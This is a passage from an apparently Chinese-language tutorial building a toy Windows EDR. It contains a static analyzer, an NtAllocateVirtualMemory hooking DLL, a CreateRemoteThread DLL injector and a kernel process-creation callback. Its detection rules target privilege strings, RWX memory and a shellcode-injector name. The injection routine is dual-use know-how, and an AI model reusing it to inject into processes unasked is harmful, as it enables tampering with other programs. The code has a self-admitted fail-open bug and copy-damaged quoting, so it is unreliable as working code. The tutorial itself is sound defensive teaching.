  133. }
  135. BOOL lookForSeDebugPrivilegeString(const wchar_t* filename) {
  136.     FILE* file;
  137.     _wfopen_s(&file, filename, L“rb”);
  138.     if (file != NULL) {
  139.         fseek(file, 0, SEEK_END);
  140.         long file_size = ftell(file);
  141.         rewind(file);
  142.         char* buffer = (char*)malloc(file_size);
  143.         if (buffer != NULL) {
  144.             if (fread(buffer, 1, file_size, file) == file_size) {
  145.                 const char* search_string = “SeDebugPrivilege”;
  146.                 size_t search_length = strlen(search_string);
  147.                 int i, j;
  148.                 int found = 0;
  149.                 for (i = 0; i <= file_size – search_length; i++) {
  150.                     for (j = 0; j < search_length; j++) {
  151.                         if (buffer[i + j] != search_string[j]) {
  152.                             break;
  153.                         }
  154.                     }
  155.                     if (j == search_length) {
  156.                         return TRUE;
  157.                     }
  158.                 }
  159.             }
  160.             free(buffer);
  161.         }
  162.         fclose(file);
  163.     }
  164.     return FALSE;
  165. }
  167. int main() {
  168.     LPCWSTR pipeName = L“\\\\.\\pipe\\dumbedr-analyzer”;
  169.     DWORD bytesRead = 0;
  170.     wchar_t target_binary_file[MESSAGE_SIZE] = { 0 };
  172.     printf(“Launching analyzer named pipe server\n”);
  174.     // Creates a named pipe
  175.     HANDLE hServerPipe = CreateNamedPipe(
  176.         pipeName,                 // Pipe name to create
  177.         PIPE_ACCESS_DUPLEX,       // Whether the pipe is supposed to receive or send data (can be both)
  178.         PIPE_TYPE_MESSAGE,        // Pipe mode (whether or not the pipe is waiting for data)
  179.         PIPE_UNLIMITED_INSTANCES, // Maximum number of instances from 1 to PIPE_UNLIMITED_INSTANCES
  180.         MESSAGE_SIZE,             // Number of bytes for output buffer
  181.         MESSAGE_SIZE,             // Number of bytes for input buffer
  182.         0,                        // Pipe timeout 
  183.         NULL                      // Security attributes (anonymous connection or may be needs credentials. )
  184.     );
  186.     while (TRUE) {
  188.         // ConnectNamedPipe enables a named pipe server to start listening for incoming connections
  189.         BOOL isPipeConnected = ConnectNamedPipe(
  190.             hServerPipe, // Handle to the named pipe
  191.             NULL         // Whether or not the pipe supports overlapped operations
  192.         );
  194.         wchar_t target_binary_file[MESSAGE_SIZE] = { 0 };
  195.         if (isPipeConnected) {
  196.             // Read from the named pipe
  197.             ReadFile(
  198.                 hServerPipe,         // Handle to the named pipe
  199.                 &target_binary_file, // Target buffer where to stock the output
  200.                 MESSAGE_SIZE,        // Size of the buffer
  201.                 &bytesRead,          // Number of bytes read from ReadFile
  202.                 NULL                 // Whether or not the pipe supports overlapped operations
  203.             );
  205.             printf(“~> Received binary file %ws\n”, target_binary_file);
  206.             int res = 0;
  208.             BOOL isSeDebugPrivilegeStringPresent = lookForSeDebugPrivilegeString(target_binary_file);
  209.             if (isSeDebugPrivilegeStringPresent == TRUE) {
  210.                 printf(“\t\033[31mFound SeDebugPrivilege string.\033[0m\n”);
  211.             }
  212.             else {
  213.                 printf(“\t\033[32mSeDebugPrivilege string not found.\033[0m\n”);
  214.             }
  216.             BOOL isDangerousFunctionsFound = ListImportedFunctions(target_binary_file);
  217.             if (isDangerousFunctionsFound == TRUE) {
  218.                 printf(“\t\033[31mDangerous functions found.\033[0m\n”);
  219.             }
  220.             else {
  221.                 printf(“\t\033[32mNo dangerous functions found.\033[0m\n”);
  222.             }
  224.             BOOL isSigned = VerifyEmbeddedSignature(target_binary_file);
  225.             if (isSigned == TRUE) {
  226.                 printf(“\t\033[32mBinary is signed.\033[0m\n”);
  227.             }
  228.             else {
  229.                 printf(“\t\033[31mBinary is not signed.\033[0m\n”);
  230.             }
  232.             wchar_t response[MESSAGE_SIZE] = { 0 };
  233.             if (isSigned == TRUE) {
  234.                 swprintf_s(response, MESSAGE_SIZE, L“OK\0”);
  235.                 printf(“\t\033[32mStaticAnalyzer allows\033[0m\n”);
  236.             }
  237.             else {
  238.                 // If the following conditions are met, the binary is blocked
  239.                 if (isDangerousFunctionsFound || isSeDebugPrivilegeStringPresent) {
  240.                     swprintf_s(response, MESSAGE_SIZE, L“KO\0”);
  241.                     printf(“\n\t\033[31mStaticAnalyzer denies\033[0m\n”);
  242.                 }
  243.                 else {
  244.                     swprintf_s(response, MESSAGE_SIZE, L“OK\0”);
  245.                     printf(“\n\t\033[32mStaticAnalyzer allows\033[0m\n”);
  246.                 }
  247.             }
  249.             DWORD bytesWritten = 0;
  250.             // Write to the named pipe
  251.             WriteFile(
  252.                 hServerPipe,   // Handle to the named pipe
  253.                 response,      // Buffer to write from
  254.                 MESSAGE_SIZE,  // Size of the buffer 
  255.                 &bytesWritten, // Numbers of bytes written
  256.                 NULL           // Whether or not the pipe supports overlapped operations
  257.             );
  259.         }
  261.         // Disconnect
  262.         DisconnectNamedPipe(
  263.             hServerPipe // Handle to the named pipe
  264.         );
  266.         printf(“\n\n”);
  267.     }
  268.     return 0;
  269. }

动态检测

动态检测也分为两个部分,第一个是被注入的Dll,第二个是Dll的注入程序

DLL.cpp

  1. // dllmain.cpp : 定义 DLL 应用程序的入口点。
  2. #include “pch.h”
  4. #include “MinHook.h”
  7. // Defines the prototype of the NtAllocateVirtualMemoryFunction
  8. typedef DWORD(NTAPI* pNtAllocateVirtualMemory)(
  9.     HANDLE ProcessHandle,
  10.     PVOID* BaseAddress,
  11.     ULONG_PTR ZeroBits,
  12.     PSIZE_T RegionSize,
  13.     ULONG AllocationType,
  14.     ULONG Protect
  15.     );
  17. // Pointer to the trampoline function used to call the original NtAllocateVirtualMemory
  18. pNtAllocateVirtualMemory pOriginalNtAllocateVirtualMemory = NULL;
  20. // This is the function that will be called whenever the injected process calls 
  21. // NtAllocateVirtualMemory. This function takes the arguments Protect and checks
  22. // if the requested protection is RWX (which shouldn’t happen).
  23. DWORD NTAPI NtAllocateVirtualMemory(
  24.     HANDLE ProcessHandle,
  25.     PVOID* BaseAddress,
  26.     ULONG_PTR ZeroBits,
  27.     PSIZE_T RegionSize,
  28.     ULONG AllocationType,
  29.     ULONG Protect
  30. ) {
  32.     // Checks if the program is trying to allocate some memory and protect it with RWX 
  33.     if (Protect == PAGE_EXECUTE_READWRITE) {
  34.         // If yes, we notify the user and terminate the process
  35.         MessageBox(NULLL”Dude, are you trying to RWX me ?”L”Found u bro”, MB_OK);
  36.         TerminateProcess(GetCurrentProcess(), 0xdeadb33f);
  37.     }
  39.     //If no, we jump on the originate NtAllocateVirtualMemory
  40.     return pOriginalNtAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect);
  41. }
  43. // This function initializes the hooks via the MinHook library
  44. DWORD WINAPI InitHooksThread(LPVOID param) {
  45.     if (MH_Initialize() != MH_OK) {
  46.         return -1;
  47.     }
  49.     // Here we specify which function from wich DLL we want to hook
  50.     MH_CreateHookApi(
  51.         L”ntdll”,                                     // Name of the DLL containing the function to  hook
  52.         “NtAllocateVirtualMemory”,                    // Name of the function to hook
  53.         NtAllocateVirtualMemory,                      // Address of the function on which to jump when hooking 
  54.         (LPVOID*)(&pOriginalNtAllocateVirtualMemory) // Address of the original NtAllocateVirtualMemory function
  55.     );
  57.     // Enable the hook on NtAllocateVirtualMemory
  58.     MH_STATUS status = MH_EnableHook(MH_ALL_HOOKS);
  59.     return status;
  60. }
  62. // Here is the DllMain of our DLL
  63. BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
  64.     switch (ul_reason_for_call) {
  65.     case DLL_PROCESS_ATTACH: {
  66.         // This DLL will not be loaded by any thread so we simply disable DLL_TRHEAD_ATTACH and DLL_THREAD_DETACH
  67.         DisableThreadLibraryCalls(hModule);
  69.         // Calling WinAPI32 functions from the DllMain is a very bad practice 
  70.         // since it can basically lock the program loading the DLL
  71.         // Microsoft recommends not using any functions here except a few one like 
  72.         // CreateThread IF AND ONLY IF there is no need for synchronization
  73.         // So basically we are creating a thread that will execute the InitHooksThread function 
  74.         // thus allowing us hooking the NtAllocateVirtualMemory function
  75.         HANDLE hThread = CreateThread(NULL0, InitHooksThread, NULL0NULL);
  76.         if (hThread != NULL) {
  77.             CloseHandle(hThread);
  78.         }
  79.         break;
  80.     }
  81.     case DLL_PROCESS_DETACH:
  82.         break;
  83.     }
  84.     return TRUE;
  85. }
EdrRemoteInjectDll.cpp
  2. #include <stdio.h>
  3. #include <windows.h>
  5. #define MESSAGE_SIZE 2048
  6. #define MAX_PATH 260
  8. int main() {
  9.     LPCWSTR pipeName = L”\\\\.\\pipe\\dumbedr-injector”;
  10.     DWORD bytesRead = 0;
  11.     wchar_t target_binary_file[MESSAGE_SIZE] = { 0 };
  13.     char dll_path[] = “MyDumbEDRDLL.dll”;
  14.     char dll_full_path[MAX_PATH];
  15.     GetFullPathNameA(dll_path, MAX_PATH, dll_full_path, NULL);
  16.     printf(“Launching injector named pipe server, injecting %s\n”, dll_full_path);
  19.     // Creates a named pipe
  20.     HANDLE hServerPipe = CreateNamedPipe(
  21.         pipeName,                 // Pipe name to create
  22.         PIPE_ACCESS_DUPLEX,       // Whether the pipe is supposed to receive or send data (can be both)
  23.         PIPE_TYPE_MESSAGE,        // Pipe mode (whether or not the pipe is waiting for data)
  24.         PIPE_UNLIMITED_INSTANCES, // Maximum number of instances from 1 to PIPE_UNLIMITED_INSTANCES
  25.         MESSAGE_SIZE,             // Number of bytes for output buffer
  26.         MESSAGE_SIZE,             // Number of bytes for input buffer
  27.         0,                        // Pipe timeout 
  28.         NULL                      // Security attributes (anonymous connection or may be needs credentials. )
  29.     );
  31.     while (TRUE) {
  33.         // ConnectNamedPipe enables a named pipe server to start listening for incoming connections
  34.         BOOL isPipeConnected = ConnectNamedPipe(
  35.             hServerPipe, // Handle to the named pipe
  36.             NULL         // Whether or not the pipe supports overlapped operations
  37.         );
  39.         wchar_t message[MESSAGE_SIZE] = { 0 };
  41.         if (isPipeConnected) {
  43.             // Read from the named pipe
  44.             ReadFile(
  45.                 hServerPipe,  // Handle to the named pipe
  46.                 &message,     // Target buffer where to stock the output
  47.                 MESSAGE_SIZE, // Size of the buffer
  48.                 &bytesRead,   // Number of bytes read from ReadFile
  49.                 NULL          // Whether or not the pipe supports overlapped operations
  50.             );
  52.             // Casting the message into a DWORD
  53.             DWORD target_pid = _wtoi(message);
  54.             printf(“~> Received process id %d\n”, target_pid);
  56.             // Opening the process with necessary privileges 
  57.             HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, target_pid);
  58.             if (hProcess == NULL) {
  59.                 printf(“Can’t open handle, error: % lu\n”, GetLastError());
  60.                 return FALSE;
  61.             }
  62.             printf(“\tOpen handle on PID: %d\n”, target_pid);
  64.             // Looking for the LoadLibraryA function in the kernel32.dll
  65.             FARPROC loadLibAddress = GetProcAddress(GetModuleHandle(L”kernel32.dll”), “LoadLibraryA”);
  66.             if (loadLibAddress == NULL) {
  67.                 printf(“Could not find LoadLibraryA, error: %lu\n”, GetLastError());
  68.                 return FALSE;
  69.             }
  70.             printf(“\tFound LoadLibraryA function\n”);
  72.             // Allocating some memory wth read/write privileges
  73.             LPVOID vae_buffer;
  74.             vae_buffer = VirtualAllocEx(hProcess, NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  75.             if (vae_buffer == NULL) {
  76.                 printf(“Can’t allocate memory, error: %lu\n”, GetLastError());
  77.                 CloseHandle(hProcess);
  78.                 return FALSE;
  79.             }
  80.             printf(“\tAllocated: %d bytes\n”, MAX_PATH);
  82.             // Writing the path of the DLL to inject: x64\Debug\MyDumbEDRDLL.dll
  83.             SIZE_T bytesWritten;
  84.             if (!WriteProcessMemory(hProcess, vae_buffer, dll_full_path, MAX_PATH, &bytesWritten)) {
  85.                 printf(“Can’t write into memory, error: %lu\n”, GetLastError());
  86.                 VirtualFreeEx(hProcess, vae_buffer, MESSAGE_SIZE, MEM_RELEASE);
  87.                 CloseHandle(hProcess);
  88.                 return FALSE;
  89.             }
  90.             printf(“\tWrote %zu in %d process memory\n”, bytesWritten, target_pid);
  92.             // Creating a thread that will call LoadLibraryA and the path of the MyDUMBEDRDLL to load as argument
  93.             HANDLE hThread = CreateRemoteThread(hProcess, NULL0, (LPTHREAD_START_ROUTINE)loadLibAddress, vae_buffer, 0NULL);
  94.             if (hThread == NULL) {
  95.                 printf(“Can’t launch remote thread, error: %lu\n”, GetLastError());
  96.                 VirtualFreeEx(hProcess, vae_buffer, MESSAGE_SIZE, MEM_RELEASE);
  97.                 CloseHandle(hProcess);
  98.                 return FALSE;
  99.             }
  100.             printf(“\tLaunched remote thread\n”);
  102.             // Freeing allocated memory as well as handles
  103.             VirtualFreeEx(hProcess, vae_buffer, MESSAGE_SIZE, MEM_RELEASE);
  104.             CloseHandle(hThread);
  105.             CloseHandle(hProcess);
  106.             printf(“\tClosed handle\n”);
  108.             wchar_t response[MESSAGE_SIZE] = { 0 };
  109.             swprintf_s(response, MESSAGE_SIZE, L”OK\0″);
  110.             DWORD pipeBytesWritten = 0;
  112.             // Inform the driver that the injection was successful
  113.             WriteFile(
  114.                 hServerPipe,       // Handle to the named pipe
  115.                 response,          // Buffer to write from
  116.                 MESSAGE_SIZE,      // Size of the buffer 
  117.                 &pipeBytesWritten, // Numbers of bytes written
  118.                 NULL               // Whether or not the pipe supports overlapped operations
  119.             );
  121.             // Disconnect
  122.             DisconnectNamedPipe(
  123.                 hServerPipe // Handle to the named pipe
  124.             );
  126.             printf(“\n\n”);
  127.         }
  128.     }
  129. }
EDR 驱动代码EDR.c
  1. #include <Ntifs.h>
  2. #include <ntddk.h>
  3. #include <wdf.h>
  4. #include <string.h>
  5. #include <stdio.h>
  6. #include <fltkernel.h>
  8. // Needs to be set on the project properties as well
  9. #pragma comment(lib, “FltMgr.lib”)
  11. // Maximum size of the buffers used to communicate via Named Pipes
  12. #define MESSAGE_SIZE 2048
  14. UNICODE_STRING DEVICE_NAME = RTL_CONSTANT_STRING(L“\\Device\\MyDumbEDR”); // Internal driver device name, cannot be used userland
  15. UNICODE_STRING SYM_LINK = RTL_CONSTANT_STRING(L“\\??\\MyDumbEDR”);        // Symlink used to reach the driver, can be used userland
  17. /*
  18. This function is sending the path as well as the name of the binary being launched
  19. to the DumbEDRAnalyzer agent running in userland
  20. */
  21. int analyze_binary(wchar_t* binary_file_path) {
  23.     UNICODE_STRING pipeName; // String containing the name of the named
  24.     // Initialize a UNICODE_STRING structure containing the name of the named pipe
  25.     RtlInitUnicodeString(
  26.         &pipeName,                      // Variable in which we will store the UNICODE_STRING structure
  27.         L“\\??\\pipe\\dumbedr-analyzer” // Wide string containing the name of the named pipe
  28.     );
  30.     HANDLE hPipe;                     // Handle that we will use to communicate with the named pipe
  31.     OBJECT_ATTRIBUTES fattrs = { 0 }; // Objects Attributes used to store information when calling ZwCreateFile
  32.     IO_STATUS_BLOCK io_stat_block;    // IO status block used to specify the state of a I/O request
  34.     // Initialize an OBJECT_ATTRIBUTE structure pointing to our named pipe
  35.     InitializeObjectAttributes(&fattrs, &pipeName, OBJ_CASE_INSENSITIVE | 0x02000NULL);
  37.     // Reads from the named pipe
  38.     NTSTATUS status = ZwCreateFile(
  39.         &hPipe,                                         // Handle to the named pipe
  40.         FILE_WRITE_DATA | FILE_READ_DATA | SYNCHRONIZE, // File attribute (we need both read and write)
  41.         &fattrs,                                        // Structure containing the file attribute
  42.         &io_stat_block,                                 // Structure containing the I/O queue
  43.         NULL,                                           // Allocation size, not needed in that case
  44.         0,                                              // Specific files attributes (not needed as well
  45.         FILE_SHARE_READ | FILE_SHARE_WRITE,             // File sharing access
  46.         FILE_OPEN,                                      // Specify the action we want to do on the file 
  47.         FILE_NON_DIRECTORY_FILE,                        // Specifying that the file is not a directory
  48.         NULL,                                           // Always NULL
  49.         0                                               // Always zero
  50.     );
  52.     // If we can obtain a handle on the named pipe then 
  53.     if (NT_SUCCESS(status)) {
  55.         // Now we’ll send the binary path to the userland agent
  56.         status = ZwWriteFile(
  57.             hPipe,            // Handle to the named pipe
  58.             NULL,             // Optionally a handle on an even object
  59.             NULL,             // Always NULL
  60.             NULL,             // Always NULL
  61.             &io_stat_block,   // Structure containing the I/O queue
  62.             binary_file_path, // Buffer in which is stored the binary path
  63.             MESSAGE_SIZE,     // Maximum size of the buffer
  64.             NULL,             // Bytes offset (optional)
  65.             NULL              // Always NULL
  66.         );
  68.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWriteFile: 0x%0.8x\n”, status);
  70.         /*
  71.         This function is needed when you are running read/write files operation so that the kernel driver
  72.         makes sure that the reading/writing phase is done and you can keep running the code
  73.         */
  75.         status = ZwWaitForSingleObject(
  76.             hPipe, // Handle the named pipe
  77.             FALSE// Whether or not we want the wait to be alertable
  78.             NULL   // An optional timeout
  79.         );
  81.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWaitForSingleObject: 0x%0.8x\n”, status);
  83.         wchar_t response[MESSAGE_SIZE] = { 0 };
  84.         // Reading the respons from the named pipe (ie: if the binary is malicious or not based on static analysis)
  85.         status = ZwReadFile(
  86.             hPipe,          // Handle to the named pipe
  87.             NULL,           // Optionally a handle on an even object
  88.             NULL,           // Always NULL
  89.             NULL,           // Always NULL
  90.             &io_stat_block, // Structure containing the I/O queue
  91.             &response,      // Buffer in which to store the answer
  92.             MESSAGE_SIZE,   // Maximum size of the buffer
  93.             NULL,           // Bytes offset (optional)
  94.             NULL            // Always NULL
  95.         );
  97.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwReadFile: 0x%0.8x\n”, status);
  99.         // Waiting again for the operation to be completed
  100.         status = ZwWaitForSingleObject(
  101.             hPipe,
  102.             FALSE,
  103.             NULL
  104.         );
  106.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWaitForSingleObject: 0x%0.8x\n”, status);
  108.         // Used to close a connection to the named pipe
  109.         ZwClose(
  110.             hPipe // Handle to the named pipe
  111.         );
  113.         if (wcscmp(response, L“OK\0”) == 0) {
  114.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            StaticAnalyzer: OK\n”, response);
  115.             return 0;
  116.         }
  117.         else {
  118.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            StaticAnalyzer: KO\n”, response);
  119.             return 0;
  120.             // return 1;
  121.         }
  122.     }
  123.     else {
  124.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            StaticAnalyzer unreachable. Allowing.\n”);
  125.         return 0;
  126.     }
  127. }
  129. int inject_dll(int pid) {
  130.     UNICODE_STRING pipeName; // String containing the name of the named
  131.     // Initialize a UNICODE_STRING structure containing the name of the named pipe
  132.     RtlInitUnicodeString(
  133.         &pipeName,                      // Variable in which we will store the UNICODE_STRING structure
  134.         L“\\??\\pipe\\dumbedr-injector” // Wide string containing the name of the named pipe
  135.     );
  137.     HANDLE hPipe;                     // Handle that we will use to communicate with the named pipe
  138.     OBJECT_ATTRIBUTES fattrs = { 0 }; // Objects Attributes used to store information when calling ZwCreateFile
  139.     IO_STATUS_BLOCK io_stat_block;    // IO status block used to specify the state of a I/O request
  141.     // Initialize an OBJECT_ATTRIBUTE structure pointing to our named pipe
  142.     InitializeObjectAttributes(&fattrs, &pipeName, OBJ_CASE_INSENSITIVE | 0x02000NULL);
  144.     // Reads from the named pipe
  145.     NTSTATUS status = ZwCreateFile(
  146.         &hPipe,                                         // Handle to the named pipe
  147.         FILE_WRITE_DATA | FILE_READ_DATA | SYNCHRONIZE, // File attribute (we need both read and write)
  148.         &fattrs,                                        // Structure containing the file attribute
  149.         &io_stat_block,                                 // Structure containing the I/O queue
  150.         NULL,                                           // Allocation size, not needed in that case
  151.         0,                                              // Specific files attributes (not needed as well
  152.         FILE_SHARE_READ | FILE_SHARE_WRITE,             // File sharing access
  153.         FILE_OPEN,                                      // Specify the action we want to do on the file 
  154.         FILE_NON_DIRECTORY_FILE,                        // Specifying that the file is not a directory
  155.         NULL,                                           // Always NULL
  156.         0                                               // Always zero
  157.     );
  159.     // If we can obtain a handle on the named pipe then 
  160.     if (NT_SUCCESS(status)) {
  162.         wchar_t pid_to_inject[MESSAGE_SIZE] = { 0 };
  163.         swprintf_s(pid_to_inject, MESSAGE_SIZE, L“%d\0”, pid);
  164.         // Now we’ll send the binary path to the userland agent
  165.         status = ZwWriteFile(
  166.             hPipe,          // Handle to the named pipe
  167.             NULL,           // Optionally a handle on an even object
  168.             NULL,           // Always NULL
  169.             NULL,           // Always NULL
  170.             &io_stat_block, // Structure containing the I/O queue
  171.             pid_to_inject,  // Buffer in which is stored the binary path
  172.             MESSAGE_SIZE,   // Maximum size of the buffer
  173.             NULL,           // Bytes offset (optional)
  174.             NULL            // Always NULL
  175.         );
  177.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWriteFile: 0x%0.8x\n”, status);
  179.         /*
  180.         This function is needed when you are running read/write files operation so that the kernel driver
  181.         makes sure that the reading/writing phase is done and you can keep running the code
  182.         */
  184.         status = ZwWaitForSingleObject(
  185.             hPipe, // Handle the named pipe
  186.             FALSE// Whether or not we want the wait to be alertable
  187.             NULL   // An optional timeout
  188.         );
  190.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWaitForSingleObject: 0x%0.8x\n”, status);
  192.         wchar_t response[MESSAGE_SIZE] = { 0 };
  193.         // Reading the response from the named pipe (ie: if the binary is malicious or not based on static analysis)
  194.         status = ZwReadFile(
  195.             hPipe,          // Handle to the named pipe
  196.             NULL,           // Optionally a handle on an even object
  197.             NULL,           // Always NULL
  198.             NULL,           // Always NULL
  199.             &io_stat_block, // Structure containing the I/O queue
  200.             &response,      // Buffer in which to store the answer
  201.             MESSAGE_SIZE,   // Maximum size of the buffer
  202.             NULL,           // Bytes offset (optional)
  203.             NULL            // Always NULL
  204.         );
  206.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwReadFile: 0x%0.8x\n”, status);
  208.         // Waiting again for the operation to be completed
  209.         status = ZwWaitForSingleObject(
  210.             hPipe,
  211.             FALSE,
  212.             NULL
  213.         );
  215.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ZwWaitForSingleObject: 0x%0.8x\n”, status);
  217.         // Used to close a connection to the named pipe
  218.         ZwClose(
  219.             hPipe // Handle to the named pipe
  220.         );
  222.         if (wcscmp(response, L“OK\0”) == 0) {
  223.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            RemoteInjector: OK\n”, response);
  224.             return 0;
  225.         }
  226.         else {
  227.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            RemoteInjector: KO\n”, response);
  228.             return 1;
  229.         }
  230.     }
  231.     else {
  232.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            RemoteInjector unreachable. Allowing.\n”);
  233.         return 0;
  234.     }
  235. }
  237. void CreateProcessNotifyRoutine(PEPROCESS parent_process, HANDLE pid, PPS_CREATE_NOTIFY_INFO createInfo) {
  238.     UNREFERENCED_PARAMETER(parent_process);
  240.     PEPROCESS process = NULL;
  241.     PUNICODE_STRING processName = NULL;
  243.     PsLookupProcessByProcessId(pid, &process);
  244.     SeLocateProcessImageName(process, &processName);
  246.     // Never forget this if check because if you don’t, you’ll end up crashing your Windows system ;P
  247.     if (createInfo != NULL) {
  248.         createInfo->CreationStatus = STATUS_SUCCESS;
  250.         // Retrieve parent process ID and process name
  251.         PsLookupProcessByProcessId(createInfo->ParentProcessId, &parent_process);
  252.         PUNICODE_STRING parent_processName = NULL;
  253.         SeLocateProcessImageName(parent_process, &parent_processName);
  255.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Process %wZ created\n”, processName);
  256.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            PID: %d\n”, pid);
  257.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            Created by: %wZ\n”, parent_processName);
  258.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            ImageBase: %ws\n”, createInfo->ImageFileName->Buffer);
  260.         POBJECT_NAME_INFORMATION objFileDosDeviceName;
  261.         IoQueryFileDosDeviceName(createInfo->FileObject, &objFileDosDeviceName);
  262.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            DOS path: %ws\n”, objFileDosDeviceName->Name.Buffer);
  263.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            CommandLine: %ws\n”, createInfo->CommandLine->Buffer);
  265.         // Compare the image base of the launched process to the dump_lasss string
  266.         if (wcsstr(createInfo->ImageFileName->Buffer, L“ShellcodeInject.exe”) != NULL) {
  268.             // Checks if the notepad keyword is found in the CommandLine
  269.             if (wcsstr(createInfo->CommandLine->Buffer, L“notepad.exe”) != NULL) {
  270.                 DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: DENIED command line\n”);
  271.                 createInfo->CreationStatus = STATUS_ACCESS_DENIED;
  272.                 return;
  273.             }
  275.             if (createInfo->FileOpenNameAvailable && createInfo->ImageFileName) {
  276.                 int analyzer_ret = analyze_binary(objFileDosDeviceName->Name.Buffer);
  277.                 DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”        State: analyze Static is %d\n”, analyzer_ret);
  278.                 
  279.                 if (analyzer_ret == 0) {
  280.                     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: Sending to injector\n”);
  281.                     int injector_ret = inject_dll((int)(intptr_t)pid);
  282.                     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: return injector ‘%d’\n”, injector_ret);
  284.                     if (injector_ret == 0) {
  285.                         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: PROCESS ALLOWED\n”);
  286.                         createInfo->CreationStatus = STATUS_SUCCESS;
  287.                         return;
  288.                     }
  289.                     else {
  290.                         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: PROCESS DENIED\n”);
  291.                         createInfo->CreationStatus = STATUS_ACCESS_DENIED;
  292.                         return;
  293.                     }
  294.                 }
  295.                 else {
  296.                     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, ”            State: Denied by StaticAnalyzer\n”);
  297.                     createInfo->CreationStatus = STATUS_ACCESS_DENIED;
  298.                     return;
  299.                 }
  300.             }
  301.         }
  302.     }
  303.     // Logical bug here, if the agent is not running, the driver will always allow the creation of the process
  304.     else {
  305.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Process %wZ killed\n”, processName);
  306.     }
  307. }
  309. void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {
  310.     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “[MyDumbEDR] Unloading routine called\n”);
  311.     // Unset the callback
  312.     PsSetCreateProcessNotifyRoutineEx((PCREATE_PROCESS_NOTIFY_ROUTINE_EX)CreateProcessNotifyRoutine, TRUE);
  313.     // Delete the driver device 
  314.     IoDeleteDevice(DriverObject->DeviceObject);
  315.     // Delete the symbolic link
  316.     IoDeleteSymbolicLink(&SYM_LINK);
  317. }
  319. NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {
  320.     // Prevent compiler error such as unreferenced parameter (error 4)
  321.     UNREFERENCED_PARAMETER(RegistryPath);
  323.     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Initializing the EDR’s driver\n”);
  325.     // Variable that will store the output of WinAPI functions
  326.     NTSTATUS status;
  328.     // Setting the unload routine to execute
  329.     DriverObject->DriverUnload = UnloadMyDumbEDR;
  331.     // Initializing a device object and creating it
  332.     PDEVICE_OBJECT DeviceObject;
  333.     UNICODE_STRING deviceName = DEVICE_NAME;
  334.     UNICODE_STRING symlinkName = SYM_LINK;
  335.     status = IoCreateDevice(
  336.         DriverObject,     // our driver object,
  337.         0,        // no need for extra bytes,
  338.         &deviceName,           // the device name,
  339.         FILE_DEVICE_UNKNOWN,   // device type,
  340.         0,        // characteristics flags,
  341.         FALSE,       // not exclusive,
  342.         &DeviceObject     // the resulting pointer
  343.     );
  345.     if (!NT_SUCCESS(status)) {
  346.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Device creation failed\n”);
  347.         return status;
  348.     }
  350.     // Creating the symlink that we will use to contact our driver
  351.     status = IoCreateSymbolicLink(&symlinkName, &deviceName);
  352.     if (!NT_SUCCESS(status)) {
  353.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “[MyDumbEDR] Symlink creation failed\n”);
  354.         IoDeleteDevice(DeviceObject);
  355.         return status;
  356.     }
